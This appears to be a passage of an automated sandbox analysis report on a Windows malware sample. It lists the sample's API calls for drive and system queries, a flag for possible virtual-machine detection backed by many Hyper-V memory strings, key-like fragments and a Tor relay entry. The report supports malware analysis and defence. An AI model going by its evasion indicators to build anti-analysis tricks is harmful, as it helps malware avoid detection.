Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_005685CE __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_005685CE
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,6_2_00416D6D
Contains functionality to query local drives
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,6_2_00416AEC
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\rad8AE2B.tmp Code function: 6_2_0040AA8F __EH_prolog,GetSystemInfo,6_2_0040AA8F
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004.manifest6<p
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vmbus_31bf3856ad364e35_10.0.17134.1_none_bcf0637138185dcf.manifest\a4mqV^L
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b\amd64_microsoft-networksw..anagemen
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8.manifestZ
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239\4(
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.17134.1_none_18c6a9392dd7eb3e\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\amd64_dual_wvmic_shutdown.inf_31bf3856ad364e35_10.0.17134.1_none_36194d50cbafa987\amd64_dual_rtwlanu_oldic.inf_31bf3856ad364e35_10.0.17134.1_none_2fc0fce011dfb3bb\amd64_dual_wvmic_heartbeat.inf_31bf3856ad364e35_10.0.17134.1_none_8f1854ea8397fa4d\a70amd64_dual_sensorsalsdriver.inf_31bf3856ad364e35_10.0.17134.1_none_847807b0cdf36679\amd64_dual_usbcciddriver.inf_31bf3856ad364e35_10.0.17134.1_none_4070b1e28eb5028d\b600amd64_dual_transfercable.inf_31bf3856ad364e35_10.0.17134.1_none_d402232d8ab51364\9amd64_dual_wmbclass_wmc_union.inf_31bf3856ad364e35_10.0.17134.1_none_f0e56a6391b6ebc2\amd64_dual_xboxgipsynthetic.inf_31bf3856ad364e35_10.0.17134.1_none_01e5cd3901fe7446\40amd64_dual_wvmic_kvpexchange.inf_31bf3856ad364e35_10.0.17134.1_none_3386da29bb1b0b2f\amd64_dual_wvmic_timesync.inf_31bf3856ad364e35_10.0.17134.1_none_e4bc66a832e3dbff\3240amd64_dual_rdcameradriver.inf_31bf3856ad364e35_10.0.17134.1_none_2ca8891b3aeaacbd\amd64_dual_ts
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.17134.1_none_58d19a03c592a9cb.manifest0d\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503.manifest\11
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt<
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.17134.1_none_0fa1f97fe68f5a84.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9451618682.0000000003F16000.00000004.sdmpBinary or memory string: swow64_windowspowershell_v1.0_modules_hyper-v_1.1_274139982b49eac9.cdf-ms
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6.manifest79\
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.catq
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catifest%
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mumatt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8.manifestT
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.81_none_0a34114fff806d3f\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum.mum*
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vid_31bf3856ad364e35_10.0.17134.1_none_864a29a4e381d095.manifest2659\%p
Source: rad8AE2B.tmp, 00000006.00000003.8757040677.0000000003BE3000.00000004.sdmpBinary or memory string: wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_c77057abb7bb80d3\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b\T
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumy
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt=
Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.17134.1_en-us_662e0a371a2edd22.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310.manifestq
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.17134.1_none_c0dbf3b2f0877a05\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catata
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumb
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_d91519867fe67212.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-guest-network-drivers_31bf3856ad364e35_10.0.17134.1_none_5c8a4254832126cf.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144\v
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.17134.1_none_3ce1277763a2249b.manifestt
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmp, csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6\
Source: wscript.exe, 00000001.00000002.8654600004.0000000005440000.00000002.sdmp, rad8AE2B.tmp, 00000006.00000002.9859328234.00000000039B0000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cattstt
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..wallrules.resources_31bf3856ad364e35_10.0.17134.1_en-us_c011eec82bd47853.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9937805168.00000000047A0000.00000004.sdmpBinary or memory string: MIGJAoGBAOvJHrhM4OInasF8Qncydoq44LyqGPsQy3cofyXfOCmQEMu6KEcruGjQ
Source: rad8AE2B.tmp, 00000006.00000002.9920332018.000000000437F000.00000004.sdmpBinary or memory string: MIGJAoGBALA0Z0zCV1mYKIUzb8Pufeu/qY7gri17SSsL1QRizXqR3uT+JvMciVfk
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\amd64_ipoib6x.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_e59925927d88680e\amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\44amd64_iastorv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_ce7487caeb282db1\amd64_hyperv-vmiccore.resources_31bf3856ad364e35_10.0.17134.1_en-us_b801a316901bad5b\amd64_hyperv-vmicvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_05720885d49a5857\amd64_ialpssi_gpio.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_a649fe25b1990444\amd64_itsas35i.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_f441e46bcde20aea\7amd64_hyperv-vmsynthnic.resources_31bf3856ad364e35_10.0.17134.1_en-us_32a65f534e80b7d2\amd64_hyperv-vmemulateddevices_31bf3856ad364e35_10.0.17134.81_none_a622801bed1b811f\amd64_iastorav.i
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385.manifesttHZ!|A
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64.manifest1
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964.manifest\
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a.manifest6\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat~
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-storflt_31bf3856ad364e35_10.0.17134.1_none_fc7308d7bbb0dfd6.manifest\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad3
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8\u)IX
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catt\@
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catst+
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\66b9amd64_microsoft-onecore-encdump_31bf3856ad364e35_10.0.17134.1_none_c9af4ac1de264540\7amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582f5cbd45f0\amd64_microsoft-windows-bcrypt-dll_31bf3856ad364e35_10.0.17134.1_none_d40d1fc458900e79\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-system-user-ext_31bf3856ad364e35_10.0.17134.1_none_60e18319883c0acb\amd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\c9amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84\amd64_microsoft-onecore-sharehost_31bf3856ad364e35_10.0.17134.1_none_d2d7886a87bd
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.17134.1_none_8c46edec6c2bc4c5.manifest8
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8\
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\*
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7d?
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\'
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a.manifestgrXQV
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\t
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumstts
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6\W
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\_
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c\b
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63.manifestst
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catc\,
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_hyperv-worker-events.resources_31bf3856ad364e35_10.0.17134.1_en-us_9de5622f209a7b21\2983amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\amd64_microsoft-antimalware-scan-interface_31bf3856ad364e35_10.0.17134.1_none_3c34e651403e5e41\amd64_ialpss2i_i2c_skl.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_980be98350adbd52\amd64_microsoft-analog-h2-fxpkg-baked_31bf3856ad364e35_10.0.17134.1_none_1be886b2910c8266\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.165_none_d73dd06b14358015\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.1_none_db29adc7273ced52\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.112_none_f4554668364f9786\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.1_none_f80e1506497cdc7d\amd64_microsoft-composable-start-binaries_31bf3856ad364e35_10.0.17134.1_none_6e6feff719ed9f5c\amd64_micros
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f.manifest\
Source: unverified-microdesc-consensus.tmp.6.drBinary or memory string: r VirtualMachineOrg 3hz5HBi0yPhCMh1mQ2wD0bZyqTs 2019-01-29 04:26:31 178.254.30.66 9001 9030
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb.manifest
